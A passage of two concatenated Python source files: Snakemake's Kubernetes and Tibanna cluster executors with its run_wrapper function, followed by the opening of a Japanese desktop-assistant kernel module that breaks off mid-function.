secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB, but grows larger after being base64 encoded
# We should exclude them as well, otherwise Kubernetes APIs will complain
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may rais 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
node_selector = {}
if "machine_type" in job.resources.keys():
# Kubernetes labels a node by its instance type using this node_label.
node_selector["node.kubernetes.io/instance-type"] = job.resources[
"machine_type"
]
body.spec = kubernetes.client.V1PodSpec(
containers=[container], node_selector=node_selector
)
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
_v5__main__kernel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
import pyautogui
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
# インターフェース
qCtrl_control_kernel = 'temp/control_kernel.txt'
qCtrl_control_speech = 'temp/control_speech.txt'
qCtrl_control_vision = 'temp/control_vision.txt'
qCtrl_control_desktop = 'temp/control_desktop.txt'
qCtrl_control_self = qCtrl_control_kernel
qCtrl_control_bgm = 'temp/control_bgm.txt'
qCtrl_control_browser = 'temp/control_browser.txt'
qCtrl_control_player = 'temp/control_player.txt'
# Python
qPython_main_speech = '_v5__main_speech.py'
qPython_main_vision = '_v5__main_vision.py'
qPython_main_desktop = '_v5__main_desktop.py'
qPython_bgm = '_v5__sub_bgm.py'
qPython_browser = '_v5__sub_browser.py'
qPython_player = '_v5__sub_player.py'
qPython_selfcheck = '_v5_sub_self_check.py'
qPython_smartSpk = '_v5_sub_smart_speaker.py'
qPython_rssSearch = '_v5_sub_rss_search.py'
qPython_weather = '_v5_sub_weather_search.py'
# 共通ルーチン
import _v5__qRiKi
qRiKi = _v5__qRiKi.qRiKi_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qGuide
qGuide= _v5__qGuide.qGuide_class()
qPLATFORM = qRiKi.getValue('qPLATFORM' )
qRUNATTR = qRiKi.getValue('qRUNATTR' )
qHOSTNAME = qRiKi.getValue('qHOSTNAME' )
qUSERNAME = qRiKi.getValue('qUSERNAME' )
qPath_pictures = qRiKi.getValue('qPath_pictures' )
qPath_videos = qRiKi.getValue('qPath_videos' )
qPath_cache = qRiKi.getValue('qPath_cache' )
qPath_sounds = qRiKi.getValue('qPath_sounds' )
qPath_icons = qRiKi.getValue('qPath_icons' )
qPath_fonts = qRiKi.getValue('qPath_fonts' )
qPath_log = qRiKi.getValue('qPath_log' )
qPath_work = qRiKi.getValue('qPath_work' )
qPath_rec = qRiKi.getValue('qPath_rec' )
qPath_s_ctrl = qRiKi.getValue('qPath_s_ctrl' )
qPath_s_inp = qRiKi.getValue('qPath_s_inp' )
qPath_s_wav = qRiKi.getValue('qPath_s_wav' )
qPath_s_jul = qRiKi.getValue('qPath_s_jul' )
qPath_s_STT = qRiKi.getValue('qPath_s_STT' )
qPath_s_TTS = qRiKi.getValue('qPath_s_TTS' )
qPath_s_TRA = qRiKi.getValue('qPath_s_TRA' )
qPath_s_play = qRiKi.getValue('qPath_s_play' )
qPath_v_ctrl = qRiKi.getValue('qPath_v_ctrl' )
qPath_v_inp = qRiKi.getValue('qPath_v_inp' )
qPath_v_jpg = qRiKi.getValue('qPath_v_jpg' )
qPath_v_detect = qRiKi.getValue('qPath_v_detect' )
qPath_v_cv = qRiKi.getValue('qPath_v_cv' )
qPath_v_photo = qRiKi.getValue('qPath_v_photo' )
qPath_v_msg = qRiKi.getValue('qPath_v_msg' )
qPath_d_ctrl = qRiKi.getValue('qPath_d_ctrl' )
qPath_d_play = qRiKi.getValue('qPath_d_play' )
qPath_d_prtscn = qRiKi.getValue('qPath_d_prtscn' )
qPath_d_movie = qRiKi.getValue('qPath_d_movie' )
qPath_d_upload = qRiKi.getValue('qPath_d_upload' )
qBusy_dev_cpu = qRiKi.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qRiKi.getValue('qBusy_dev_com' )
qBusy_dev_mic = qRiKi.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qRiKi.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qRiKi.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qRiKi.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qRiKi.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qRiKi.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qRiKi.getValue('qBusy_s_inp' )
qBusy_s_wav = qRiKi.getValue('qBusy_s_wav' )
qBusy_s_STT = qRiKi.getValue('qBusy_s_STT' )
qBusy_s_TTS = qRiKi.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qRiKi.getValue('qBusy_s_TRA' )
qBusy_s_play = qRiKi.getValue('qBusy_s_play' )
qBusy_v_ctrl = qRiKi.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qRiKi.getValue('qBusy_v_inp' )
qBusy_v_QR = qRiKi.getValue('qBusy_v_QR' )
qBusy_v_jpg = qRiKi.getValue('qBusy_v_jpg' )
qBusy_v_CV = qRiKi.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qRiKi.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qRiKi.getValue('qBusy_d_inp' )
qBusy_d_QR = qRiKi.getValue('qBusy_d_QR' )
qBusy_d_rec = qRiKi.getValue('qBusy_d_rec' )
qBusy_d_telework = qRiKi.getValue('qBusy_d_telework' )
qBusy_d_play = qRiKi.getValue('qBusy_d_play' )
qBusy_d_browser = qRiKi.getValue('qBusy_d_browser' )
qBusy_d_upload = qRiKi.getValue('qBusy_d_upload' )
qRdy__s_force = qRiKi.getValue('qRdy__s_force' )
qRdy__s_fproc = qRiKi.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qRiKi.getValue('qRdy__s_sendkey' )
qRdy__v_mirror = qRiKi.getValue('qRdy__v_mirror' )
qRdy__v_reader = qRiKi.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qRiKi.getValue('qRdy__v_sendkey' )
qRdy__d_reader = qRiKi.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qRiKi.getValue('qRdy__d_sendkey' )
# debug
runMode = 'hud'
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = qApiTrn
if (qPLATFORM == 'windows'):
qApiOut = 'winos'
if (qPLATFORM == 'darwin'):
qApiOut = 'macos'
qLangInp = 'ja'
#qLangTrn = 'en,fr,'
qLangTrn = 'en'
qLangTxt = qLangInp
qLangOut = qLangTrn[:2]
# gui ルーチン
import _v5__main__gui
GUI = _v5__main__gui.main_gui_class()
class main_kernel:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777',
qApiInp='free', qApiTrn='free', qApiOut='free',
qLangInp='ja', qLangTrn='en,fr,', qLangTxt='ja', qLangOut='en',
):
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.qApiInp = qApiInp
self.qApiTrn = qApiTrn
self.qApiOut = qApiOut
self.qLangInp = qLangInp
self.qLangTrn = qLangTrn
self.qLangTxt = qLangTxt
self.qLangOut = qLangOut
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=20, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# ログ
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# 初期設定
self.proc_step = '1'
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
if (txt == '_end_'):
